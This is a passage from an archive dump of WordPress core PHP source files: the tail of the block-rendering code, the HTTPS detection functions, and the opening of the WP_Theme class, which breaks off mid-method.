$pre_render = apply_filters( 'pre_render_block', null, $inner_block->parsed_block, $parent_block );
if ( ! is_null( $pre_render ) ) {
$block_content .= $pre_render;
} else {
$source_block = $inner_block->parsed_block;
$inner_block_context = $inner_block->context;
/** This filter is documented in wp-includes/blocks.php */
$inner_block->parsed_block = apply_filters( 'render_block_data', $inner_block->parsed_block, $source_block, $parent_block );
/** This filter is documented in wp-includes/blocks.php */
$inner_block->context = apply_filters( 'render_block_context', $inner_block->context, $inner_block->parsed_block, $parent_block );
/*
* The `refresh_context_dependents()` method already calls `refresh_parsed_block_dependents()`.
* Therefore the second condition is irrelevant if the first one is satisfied.
*/
if ( $inner_block->context !== $inner_block_context ) {
$inner_block->refresh_context_dependents();
} elseif ( $inner_block->parsed_block !== $source_block ) {
$inner_block->refresh_parsed_block_dependents();
}
$block_content .= $inner_block->render();
}
++$index;
}
}
}
if ( ! empty( $computed_attributes ) && ! empty( $block_content ) ) {
foreach ( $computed_attributes as $attribute_name => $source_value ) {
$block_content = $this->replace_html( $block_content, $attribute_name, $source_value );
}
}
if ( $is_dynamic ) {
$global_post = $post;
$parent = WP_Block_Supports::$block_to_render;
WP_Block_Supports::$block_to_render = $this->parsed_block;
$block_content = (string) call_user_func( $this->block_type->render_callback, $this->attributes, $block_content, $this );
WP_Block_Supports::$block_to_render = $parent;
$post = $global_post;
}
if ( ( ! empty( $this->block_type->script_handles ) ) ) {
foreach ( $this->block_type->script_handles as $script_handle ) {
wp_enqueue_script( $script_handle );
}
}
if ( ! empty( $this->block_type->view_script_handles ) ) {
foreach ( $this->block_type->view_script_handles as $view_script_handle ) {
wp_enqueue_script( $view_script_handle );
}
}
if ( ! empty( $this->block_type->view_script_module_ids ) ) {
foreach ( $this->block_type->view_script_module_ids as $view_script_module_id ) {
wp_enqueue_script_module( $view_script_module_id );
}
}
/*
* For Core blocks, these styles are only enqueued if `wp_should_load_separate_core_block_assets()` returns
* true. Otherwise these `wp_enqueue_style()` calls will not have any effect, as the Core blocks are relying on
* the combined 'wp-block-library' stylesheet instead, which is unconditionally enqueued.
*/
if ( ( ! empty( $this->block_type->style_handles ) ) ) {
foreach ( $this->block_type->style_handles as $style_handle ) {
wp_enqueue_style( $style_handle );
}
}
if ( ( ! empty( $this->block_type->view_style_handles ) ) ) {
foreach ( $this->block_type->view_style_handles as $view_style_handle ) {
wp_enqueue_style( $view_style_handle );
}
}
/**
* Filters the content of a single block.
*
* @since 5.0.0
* @since 5.9.0 The `$instance` parameter was added.
*
* @param string $block_content The block content.
* @param array $block The full block, including name and attributes.
* @param WP_Block $instance The block instance.
*/
$block_content = apply_filters( 'render_block', $block_content, $this->parsed_block, $this );
/**
* Filters the content of a single block.
*
* The dynamic portion of the hook name, `$name`, refers to
* the block name, e.g. "core/paragraph".
*
* @since 5.7.0
* @since 5.9.0 The `$instance` parameter was added.
*
* @param string $block_content The block content.
* @param array $block The full block, including name and attributes.
* @param WP_Block $instance The block instance.
*/
$block_content = apply_filters( "render_block_{$this->name}", $block_content, $this->parsed_block, $this );
if ( $root_interactive_block === $this ) {
// The root interactive block has finished rendering. Time to process directives.
$block_content = wp_interactivity_process_directives( $block_content );
$root_interactive_block = null;
}
// Capture the new assets enqueued during rendering, and restore the queues the state prior to rendering.
$after_styles_queue = wp_styles()->queue;
$after_scripts_queue = wp_scripts()->queue;
$after_script_modules_queue = wp_script_modules()->get_queue();
/*
* As a very special case, a dynamic block may in fact include a call to wp_head() (and thus wp_enqueue_scripts()),
* in which all of its enqueued assets are targeting wp_footer. In this case, nothing would be printed, but this
* shouldn't indicate that the just-enqueued assets should be dequeued due to it being an empty block.
*/
$just_did_wp_enqueue_scripts = ( did_action( 'wp_enqueue_scripts' ) !== $before_wp_enqueue_scripts_count );
$has_new_styles = ( $before_styles_queue !== $after_styles_queue );
$has_new_scripts = ( $before_scripts_queue !== $after_scripts_queue );
$has_new_script_modules = ( $before_script_modules_queue !== $after_script_modules_queue );
// Dequeue the newly enqueued assets with the existing assets if the rendered block was empty & wp_enqueue_scripts did not fire.
if (
! $just_did_wp_enqueue_scripts &&
( $has_new_styles || $has_new_scripts || $has_new_script_modules ) &&
(
trim( $block_content ) === '' &&
/**
* Filters whether to enqueue assets for a block which has no rendered content.
*
* @since 6.9.0
*
* @param bool $enqueue Whether to enqueue assets.
* @param string $block_name Block name.
*/
! (bool) apply_filters( 'enqueue_empty_block_content_assets', false, $this->name )
)
) {
foreach ( array_diff( $after_styles_queue, $before_styles_queue ) as $handle ) {
wp_dequeue_style( $handle );
}
foreach ( array_diff( $after_scripts_queue, $before_scripts_queue ) as $handle ) {
wp_dequeue_script( $handle );
}
foreach ( array_diff( $after_script_modules_queue, $before_script_modules_queue ) as $handle ) {
wp_dequeue_script_module( $handle );
}
}
return $block_content;
}
}
https-detection-20260606154019.php 0000666 00000013341 15224151221 0011763 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class-wp-theme-20260621145037.php 0000666 00000200422 15224151221 0011471 0 ustar 00 <?php
/**
* WP_Theme Class
*
* @package WordPress
* @subpackage Theme
* @since 3.4.0
*/
#[AllowDynamicProperties]
final class WP_Theme implements ArrayAccess {
/**
* Whether the theme has been marked as updateable.
*
* @since 4.4.0
* @var bool
*
* @see WP_MS_Themes_List_Table
*/
public $update = false;
/**
* Headers for style.css files.
*
* @since 3.4.0
* @since 5.4.0 Added `Requires at least` and `Requires PHP` headers.
* @since 6.1.0 Added `Update URI` header.
* @var string[]
*/
private static $file_headers = array(
'Name' => 'Theme Name',
'ThemeURI' => 'Theme URI',
'Description' => 'Description',
'Author' => 'Author',
'AuthorURI' => 'Author URI',
'Version' => 'Version',
'Template' => 'Template',
'Status' => 'Status',
'Tags' => 'Tags',
'TextDomain' => 'Text Domain',
'DomainPath' => 'Domain Path',
'RequiresWP' => 'Requires at least',
'RequiresPHP' => 'Requires PHP',
'UpdateURI' => 'Update URI',
);
/**
* Default themes.
*
* @since 3.4.0
* @since 3.5.0 Added the Twenty Twelve theme.
* @since 3.6.0 Added the Twenty Thirteen theme.
* @since 3.8.0 Added the Twenty Fourteen theme.
* @since 4.1.0 Added the Twenty Fifteen theme.
* @since 4.4.0 Added the Twenty Sixteen theme.
* @since 4.7.0 Added the Twenty Seventeen theme.
* @since 5.0.0 Added the Twenty Nineteen theme.
* @since 5.3.0 Added the Twenty Twenty theme.
* @since 5.6.0 Added the Twenty Twenty-One theme.
* @since 5.9.0 Added the Twenty Twenty-Two theme.
* @since 6.1.0 Added the Twenty Twenty-Three theme.
* @since 6.4.0 Added the Twenty Twenty-Four theme.
* @since 6.7.0 Added the Twenty Twenty-Five theme.
* @var string[]
*/
private static $default_themes = array(
'classic' => 'WordPress Classic',
'default' => 'WordPress Default',
'twentyten' => 'Twenty Ten',
'twentyeleven' => 'Twenty Eleven',
'twentytwelve' => 'Twenty Twelve',
'twentythirteen' => 'Twenty Thirteen',
'twentyfourteen' => 'Twenty Fourteen',
'twentyfifteen' => 'Twenty Fifteen',
'twentysixteen' => 'Twenty Sixteen',
'twentyseventeen' => 'Twenty Seventeen',
'twentynineteen' => 'Twenty Nineteen',
'twentytwenty' => 'Twenty Twenty',
'twentytwentyone' => 'Twenty Twenty-One',
'twentytwentytwo' => 'Twenty Twenty-Two',
'twentytwentythree' => 'Twenty Twenty-Three',
'twentytwentyfour' => 'Twenty Twenty-Four',
'twentytwentyfive' => 'Twenty Twenty-Five',
);
/**
* Renamed theme tags.
*
* @since 3.8.0
* @var string[]
*/
private static $tag_map = array(
'fixed-width' => 'fixed-layout',
'flexible-width' => 'fluid-layout',
);
/**
* Absolute path to the theme root, usually wp-content/themes
*
* @since 3.4.0
* @var string
*/
private $theme_root;
/**
* Header data from the theme's style.css file.
*
* @since 3.4.0
* @var array
*/
private $headers = array();
/**
* Header data from the theme's style.css file after being sanitized.
*
* @since 3.4.0
* @var array
*/
private $headers_sanitized;
/**
* Is this theme a block theme.
*
* @since 6.2.0
* @var bool
*/
private $block_theme;
/**
* Header name from the theme's style.css after being translated.
*
* Cached due to sorting functions running over the translated name.
*
* @since 3.4.0
* @var string
*/
private $name_translated;
/**
* Errors encountered when initializing the theme.
*
* @since 3.4.0
* @var WP_Error
*/
private $errors;
/**
* The directory name of the theme's files, inside the theme root.
*
* In the case of a child theme, this is directory name of the child theme.
* Otherwise, 'stylesheet' is the same as 'template'.
*
* @since 3.4.0
* @var string
*/
private $stylesheet;
/**
* The directory name of the theme's files, inside the theme root.
*
* In the case of a child theme, this is the directory name of the parent theme.
* Otherwise, 'template' is the same as 'stylesheet'.
*
* @since 3.4.0
* @var string
*/
private $template;
/**
* A reference to the parent theme, in the case of a child theme.
*
* @since 3.4.0
* @var WP_Theme
*/
private $parent;
/**
* URL to the theme root, usually an absolute URL to wp-content/themes
*
* @since 3.4.0
* @var string
*/
private $theme_root_uri;
/**
* Flag for whether the theme's textdomain is loaded.
*
* @since 3.4.0
* @var bool
*/
private $textdomain_loaded;
/**
* Stores an md5 hash of the theme root, to function as the cache key.
*
* @since 3.4.0
* @var string
*/
private $cache_hash;
/**
* Block template folders.
*
* @since 6.4.0
* @var string[]
*/
private $block_template_folders;
/**
* Default values for template folders.
*
* @since 6.4.0
* @var string[]
*/
private $default_template_folders = array(
'wp_template' => 'templates',
'wp_template_part' => 'parts',
);
/**
* Flag for whether the themes cache bucket should be persistently cached.
*
* Default is false. Can be set with the {@see 'wp_cache_themes_persistently'} filter.
*
* @since 3.4.0
* @var bool
*/
private static $persistently_cache;
/**
* Expiration time for the themes cache bucket.
*
* By default the bucket is not cached, so this value is useless.
*
* @since 3.4.0
* @var bool
*/
private static $cache_expiration = 1800;
/**
* Constructor for WP_Theme.
*
* @since 3.4.0
*
* @global string[] $wp_theme_directories
*
* @param string $theme_dir Directory of the theme within the theme_root.
* @param string $theme_root Theme root.
* @param WP_Theme|null $_child If this theme is a parent theme, the child may be passed for validation purposes.
*/
public function __construct( $theme_dir, $theme_root, $_child = null ) {
global $wp_theme_directories;
// Initialize caching on first run.
if ( ! isset( self::$persistently_cache ) ) {
/** This action is documented in wp-includes/theme.php */
self::$persistently_cache = apply_filters( 'wp_cache_themes_persistently', false, 'WP_Theme' );
if ( self::$persistently_cache ) {
wp_cache_add_global_groups( 'themes' );
if ( is_int( self::$persistently_cache ) ) {
self::$cache_expiration = self::$persistently_cache;
}
} else {
wp_cache_add_non_persistent_groups( 'themes' );
}
}
// Handle a numeric theme directory as a string.
$theme_dir = (string) $theme_dir;
$this->theme_root = $theme_root;
$this->stylesheet = $theme_dir;
// Correct a situation where the theme is 'some-directory/some-theme' but 'some-directory' was passed in as part of the theme root instead.
if ( ! in_array( $theme_root, (array) $wp_theme_directories, true )
&& in_array( dirname( $theme_root ), (array) $wp_theme_directories, true )
) {
$this->stylesheet = basename( $this->theme_root ) . '/' . $this->stylesheet;
$this->theme_root = dirname( $theme_root );
}
$this->cache_hash = md5( $this->theme_root . '/' . $this->stylesheet );
$theme_file = $this->stylesheet . '/style.css';
$cache = $this->cache_get( 'theme' );
if ( is_array( $cache ) ) {
foreach ( array( 'block_template_folders', 'block_theme', 'errors', 'headers', 'template' ) as $key ) {
if ( isset( $cache[ $key ] ) ) {
$this->$key = $cache[ $key ];
}
}
if ( $this->errors ) {
return;
}
if ( isset( $cache['theme_root_template'] ) ) {
$theme_root_template = $cache['theme_root_template'];
}
} elseif ( ! file_exists( $this->theme_root . '/' . $theme_file ) ) {
$this->headers['Name'] = $this->stylesheet;
if ( ! file_exists( $this->theme_root . '/' . $this->stylesheet ) ) {
$this->errors = new WP_Error(
'theme_not_found',
sprintf(
/* translators: %s: Theme directory name. */
__( 'The theme directory "%s" does not exist.' ),
esc_html( $this->stylesheet )
)
);
} else {
$this->errors = new WP_Error( 'theme_no_stylesheet', __( 'Stylesheet is missing.' ) );
}
$this->template = $this->stylesheet;
$this->block_theme = false;
$this->block_template_folders = $this->default_template_folders;
$this->cache_add(
'theme',
array(
'block_template_folders' => $this->block_template_folders,
'block_theme' => $this->block_theme,
'headers' => $this->headers,
'errors' => $this->errors,
'stylesheet' => $this->stylesheet,
'template' => $this->template,
)
);
if ( ! file_exists( $this->theme_root ) ) { // Don't cache this one.
$this->errors->add( 'theme_root_missing', __( '<strong>Error:</strong> The themes directory is either empty or does not exist. Please check your installation.' ) );
}
return;
} elseif ( ! is_readable( $this->theme_root . '/' . $theme_file ) ) {
$this->headers['Name'] = $this->stylesheet;
$this->errors = new WP_Error( 'theme_stylesheet_not_readable', __( 'Stylesheet is not readable.' ) );
$this->template = $this->stylesheet;
$this->block_theme = false;
$this->block_template_folders = $this->default_template_folders;
$this->cache_add(
'theme',
array(
'block_template_folders' => $this->block_template_folders,
'block_theme' => $this->block_theme,
'headers' => $this->headers,
'errors' => $this->errors,
'stylesheet' => $this->stylesheet,
'template' => $this->template,
)
);
return;
} else {
$this->headers = get_file_data( $this->theme_root . '/' . $theme_file, self::$file_headers, 'theme' );
/*
* Default themes always trump their pretenders.
* Properly identify default themes that are inside a directory within wp-content/themes.
*/
$default_theme_slug = array_search( $this->headers['Name'], self::$default_themes, true );
if ( $default_theme_slug ) {
if ( basename( $this->stylesheet ) !== $default_theme_slug ) {
$this->headers['Name'] .= '/' . $this->stylesheet;
}
}
}
if ( ! $this->template && $this->stylesheet === $this->headers['Template'] ) {
$this->errors = new WP_Error(
'theme_child_invalid',
sprintf(
/* translators: %s: Template. */
__( 'The theme defines itself as its parent theme. Please check the %s header.' ),
'<code>Template</code>'
)
);
$this->cache_add(
'theme',
array(
'block_template_folders' => $this->get_block_template_folders(),
'block_theme' => $this->is_block_theme(),
'headers' => $this->headers,
'errors' => $this->errors,
'stylesheet' => $this->stylesheet,
)
);
return;
}
// (If template is set from cache [and there are no errors], we know it's good.)
if ( ! $this->template ) {
$this->template = $this->headers['Template'];
}
if ( ! $this->template ) {
$this->template = $this->stylesheet;
$theme_path = $this->theme_root . '/' . $this->stylesheet;
if ( ! $this->is_block_theme() && ! file_exists( $theme_path . '/index.php' ) ) {
$error_message = sprintf(
/* translators: 1: templates/index.html, 2: index.php, 3: Documentation URL, 4: Template, 5: style.css */
__( 'Template is missing. Standalone themes need to have a %1$s or %2$s template file. <a href="%3$s">Child themes</a> need to have a %4$s header in the %5$s stylesheet.' ),
'<code>templates/index.html</code>',
'<code>index.php</code>',
__( 'https://developer.wordpress.org/themes/advanced-topics/child-themes/' ),
'<code>Template</code>',
'<code>style.css</code>'
);
$this->errors = new WP_Error( 'theme_no_index', $error_message );
$this->cache_add(
'theme',
array(
'block_template_folders' => $this->get_block_template_folders(),
'block_theme' => $this->block_theme,
'headers' => $this->headers,
'errors' => $this->errors,
'stylesheet' => $this->stylesheet,
'template' => $this->template,
)
);
return;
}
}
// If we got our data from cache, we can assume that 'template' is pointing to the right place.
if ( ! is_array( $cache )
&& $this->template !== $this->stylesheet
&& ! file_exists( $this->theme_root . '/' . $this->template . '/index.php' )
) {
/*
* If we're in a directory of themes inside /themes, look for the parent nearby.
* wp-content/themes/directory-of-themes/*
*/
$parent_dir = dirname( $this->stylesheet );
$directories = search_theme_directories();
if ( '.' !== $parent_dir
&& file_exists( $this->theme_root . '/' . $parent_dir . '/' . $this->template . '/index.php' )
) {
$this->template = $parent_dir . '/' . $this->template;
} elseif ( $directories && isset( $directories[ $this->template ] ) ) {
/*
* Look for the template in the search_theme_directories() results, in case it is in another theme root.
* We don't look into directories of themes, just the theme root.
*/
$theme_root_template = $directories[ $this->template ]['theme_root'];
} else {
// Parent theme is missing.
$this->errors = new WP_Error(
'theme_no_parent',
sprintf(
/* translators: %s: Theme directory name. */
__( 'The parent theme is missing. Please install the "%s" parent theme.' ),
esc_html( $this->template )
)
);
$this->cache_add(
'theme',
array(
'block_template_folders' => $this->get_block_template_folders(),
'block_theme' => $this->is_block_theme(),
'headers' => $this->headers,
'errors' => $this->errors,
'stylesheet' => $this->stylesheet,
'template' => $this->template,
)
);
$this->parent = new WP_Theme( $this->template, $this->theme_root, $this );
return;
}
}
// Set the parent, if we're a child theme.
if ( $this->template !== $this->stylesheet ) {
// If we are a parent, then there is a problem. Only two generations allowed! Cancel things out.
if ( $_child instanceof WP_Theme && $_child->template === $this->stylesheet ) {
$_child->parent = null;
$_child->errors = new WP_Error(
'theme_parent_invalid',
sprintf(
/* translators: %s: Theme directory name. */
__( 'The "%s" theme is not a valid parent theme.' ),
esc_html( $_child->template )
)
);
$_child->cache_add(
'theme',
array(
'block_template_folders' => $_child->get_block_template_folders(),
'block_theme' => $_child->is_block_theme(),
'headers' => $_child->headers,
'errors' => $_child->errors,
'stylesheet' => $_child->stylesheet,
'template' => $_child->template,
)
);
// The two themes actually reference each other with the Template header.
if ( $_child->stylesheet === $this->template ) {
$this->errors = new WP_Error(
'theme_parent_invalid',
sprintf(
/* translators: %s: Theme directory name. */
__( 'The "%s" theme is not a valid parent theme.' ),
esc_html( $this->template )
)
);
$this->cache_add(
'theme',
array(
'block_template_folders' => $this->get_block_template_folders(),
'block_theme' => $this->is_block_theme(),
'headers' => $this->headers,
'errors' => $this->errors,
'stylesheet' => $this->stylesheet,
'template' => $this->template,
)
);
}
return;
}
// Set the parent. Pass the current instance so we can do the checks above and assess errors.
$this->parent = new WP_Theme( $this->template, isset( $theme_root_template ) ? $theme_root_template : $this->theme_root, $this );
}
if ( wp_paused_themes()->get( $this->stylesheet ) && ( ! is_wp_error( $this->errors ) || ! isset( $this->errors->errors['theme_paused'] ) ) ) {
$this->errors = new WP_Error( 'theme_paused', __( 'This theme failed to load properly and was paused within the admin backend.' ) );
}
// We're good. If we didn't retrieve from cache, set it.
if ( ! is_array( $cache ) ) {
$cache = array(
'block_theme' => $this->is_block_theme(),
'block_template_folders' => $this->get_block_template_folders(),
'headers' => $this->headers,
'errors' => $this->errors,
'stylesheet' => $this->stylesheet,
'template' => $this->template,
);
// If the parent theme is in another root, we'll want to cache this. Avoids an entire branch of filesystem calls above.
if ( isset( $theme_root_template ) ) {
$cache['theme_root_template'] = $theme_root_template;
}
$this->cache_add( 'theme', $cache );
}
}
/**
* When converting the object to a string, the theme name is returned.
*
* @since 3.4.0
*
* @return string Theme name, ready for display (translated)
*/
public function __toString() {
return (string) $this->display( 'Name' );
}
/**
* __isset() magic method for properties formerly returned by current_theme_info()
*
* @since 3.4.0
*
* @param string $offset Property to check if set.
* @return bool Whether the given property is set.
*/
public function __isset( $offset ) {
static $properties = array(
'name',
'title',
'version',
'parent_theme',
'template_dir',
'stylesheet_dir',
'template',
'stylesheet',
'screenshot',
'description',
'author',
'tags',
'theme_root',
'theme_root_uri',
);
return in_array( $offset, $properties, true );
}
/**
* __get() magic method for properties formerly returned by current_theme_info()
*
* @since 3.4.0
*
* @param string $offset Property to get.
* @return mixed Property value.
*/
public function __get( $offset ) {
switch ( $offset ) {
case 'name':
case 'title':
return $this->get( 'Name' );
case 'version':
return $this->get( 'Version' );
case 'parent_theme':
return $this->parent() ? $this->parent()->get( 'Name' ) : '';
case 'template_dir':
return $this->get_template_directory();
case 'stylesheet_dir':
return $this->get_stylesheet_directory();
case 'template':
return $this->get_template();
case 'stylesheet':
return $this->get_stylesheet();
case 'screenshot':
return $this->get_screenshot( 'relative' );
// 'author' and 'description' did not previously return translated data.
case 'description':
return $this->display( 'Description' );
case 'author':
return $this->display( 'Author' );
case 'tags':
return $this->get( 'Tags' );
case 'theme_root':
return $this->get_theme_root();
case 'theme_root_uri':
return $this->get_theme_root_uri();
// For cases where the array was converted to an object.
default:
return $this->offsetGet( $offset );
}
}
/**
* Method to implement ArrayAccess for keys formerly returned by get_themes()
*
* @since 3.4.0
*
* @param mixed $offset
* @param mixed $value
*/
#[ReturnTypeWillChange]
public function offsetSet( $offset, $value ) {}
/**
* Method to implement ArrayAccess for keys formerly returned by get_themes()
*
* @since 3.4.0
*
* @param mixed $offset
*/
#[ReturnTypeWillChange]
public function offsetUnset( $offset ) {}
/**
* Method to implement ArrayAccess for keys formerly returned by get_themes()
*
* @since 3.4.0
*
* @param mixed $offset
* @return bool
*/
#[ReturnTypeWillChange]
public function offsetExists( $offset ) {
static $keys = array(
'Name',
'Version',
'Status',
'Title',
'Author',
'Author Name',
'Author URI',
'Description',
'Template',
'Stylesheet',
'Template Files',
'Stylesheet Files',
'Template Dir',
'Stylesheet Dir',
'Screenshot',
'Tags',
'Theme Root',
'Theme Root URI',
'Parent Theme',
);
return in_array( $offset, $keys, true );
}
/**
* Method to implement ArrayAccess for keys formerly returned by get_themes().
*
* Author, Author Name, Author URI, and Description did not previously return
* translated data. We are doing so now as it is safe to do. However, as
* Name and Title could have been used as the key for get_themes(), both remain
* untranslated for back compatibility. This means that ['Name'] is not ideal,
* and care should be taken to use `$theme::display( 'Name' )` to get a properly
* translated header.
*
* @since 3.4.0
*
* @param mixed $offset
* @return mixed
*/
#[ReturnTypeWillChange]
public function offsetGet( $offset ) {
switch ( $offset ) {
case 'Name':
case 'Title':
/*
* See note above about using translated data. get() is not ideal.
* It is only for backward compatibility. Use display().
*/
return $this->get( 'Name' );
case 'Author':
return $this->display( 'Author' );
case 'Author Name':
return $this->display( 'Author', false );
case 'Author URI':
return $this->display( 'AuthorURI' );
case 'Description':
return $this->display( 'Description' );
case 'Version':
case 'Status':
return $this->get( $offset );
case 'Template':
return $this->get_template();
case 'Stylesheet':
return $this->get_stylesheet();
case 'Template Files':
return $this->get_files( 'php', 1, true );
case 'Stylesheet Files':
return $this->get_files( 'css', 0, false );
case 'Template Dir':
return $this->get_template_directory();
case 'Stylesheet Dir':
return $this->get_stylesheet_directory();
case 'Screenshot':
return $this->get_screenshot( 'relative' );
case 'Tags':
return $this->get( 'Tags' );
case 'Theme Root':
return $this->get_theme_root();
case 'Theme Root URI':
return $this->get_theme_root_uri();
case 'Parent Theme':
return $this->parent() ? $this->parent()->get( 'Name' ) : '';
default:
return null;
}
}
/**
* Returns errors property.
*
* @since 3.4.0
*
* @return WP_Error|false WP_Error if there are errors, or false.
*/
public function errors() {
return is_wp_error( $this->errors ) ? $this->errors : false;
}
/**
* Determines whether the theme exists.
*
* A theme with errors exists. A theme with the error of 'theme_not_found',
* meaning that the theme's directory was not found, does not exist.
*
* @since 3.4.0
*
* @return bool Whether the theme exists.
*/
public function exists() {
return ! ( $this->errors() && in_array( 'theme_not_found', $this->errors()->get_error_codes(), true ) );
}
/**
* Returns reference to the parent theme.
*
* @since 3.4.0
*
* @return WP_Theme|false Parent theme, or false if the active theme is not a child theme.
*/
public function parent() {
return isset( $this->parent ) ? $this->parent : false;
}
/**
* Perform reinitialization tasks.
*
* Prevents a callback from being injected during unserialization of an object.
*/
public function __wakeup() {
if ( $this->parent && ! $this->parent instanceof self ) {
throw new UnexpectedValueException();
}
if ( $this->headers && ! is_array( $this->headers ) ) {
throw new UnexpectedValueException();
}
foreach ( $this->headers as $value ) {
if ( ! is_string( $value ) ) {
throw new UnexpectedValueException();
}
}
$this->headers_sanitized = array();
}
/**
* Adds theme data to cache.
*
* Cache entries keyed by the theme and the type of data.
*
* @since 3.4.0
*
* @param string $key Type of data to store (theme, screenshot, headers, post_templates)
* @param array|string $data Data to store
* @return bool Return value from wp_cache_add()
*/
private function cache_add( $key, $data ) {
return wp_cache_add( $key . '-' . $this->cache_hash, $data, 'themes', self::$cache_expiration );
}
/**
* Gets theme data from cache.
*
* Cache entries are keyed by the theme and the type of data.
*
* @since 3.4.0
*
* @param string $key Type of data to retrieve (theme, screenshot, headers, post_templates)
* @return mixed Retrieved data
*/
private function cache_get( $key ) {
return wp_cache_get( $key . '-' . $this->cache_hash, 'themes' );
}
/**
* Clears the cache for the theme.
*
* @since 3.4.0
*/
public function cache_delete() {
foreach ( array( 'theme', 'screenshot', 'headers', 'post_templates' ) as $key ) {
wp_cache_delete( $key . '-' . $this->cache_hash, 'themes' );
}
$this->template = null;
$this->textdomain_loaded = null;
$this->theme_root_uri = null;
$this->parent = null;
$this->errors = null;
$this->headers_sanitized = null;
$this->name_translated = null;
$this->block_theme = null;
$this->block_template_folders = null;
$this->headers = array();
$this->__construct( $this->stylesheet, $this->theme_root );
$this->delete_pattern_cache();
}
/**
* Gets a raw, unformatted theme header.
*
* The header is sanitized, but is not translated, and is not marked up for display.
* To get a theme header for display, use the display() method.
*
* Use the get_template() method, not the 'Template' header, for finding the template.
* The 'Template' header is only good for what was written in the style.css, while
* get_template() takes into account where WordPress actually located the theme and
* whether it is actually valid.
*
* @since 3.4.0
*
* @param string $header Theme header. Name, Description, Author, Version, ThemeURI, AuthorURI, Status, Tags.
* @return string|array|false String or array (for Tags header) on success, false on failure.
*/
public function get( $header ) {
if ( ! isset( $this->headers[ $header ] ) ) {
return false;
}
if ( ! isset( $this->headers_sanitized ) ) {
$this->headers_sanitized = $this->cache_get( 'headers' );
if ( ! is_array( $this->headers_sanitized ) ) {
$this->headers_sanitized = array();
}
}
if ( isset( $this->headers_sanitized[ $header ] ) ) {
return $this->headers_sanitized[ $header ];
}
// If themes are a persistent group, sanitize everything and cache it. One cache add is better than many cache sets.
if ( self::$persistently_cache ) {
foreach ( array_keys( $this->headers ) as $_header ) {
$this->headers_sanitized[ $_header ] = $this->sanitize_header( $_header, $this->headers[ $_header ] );
}
$this->cache_add( 'headers', $this->headers_sanitized );
} else {
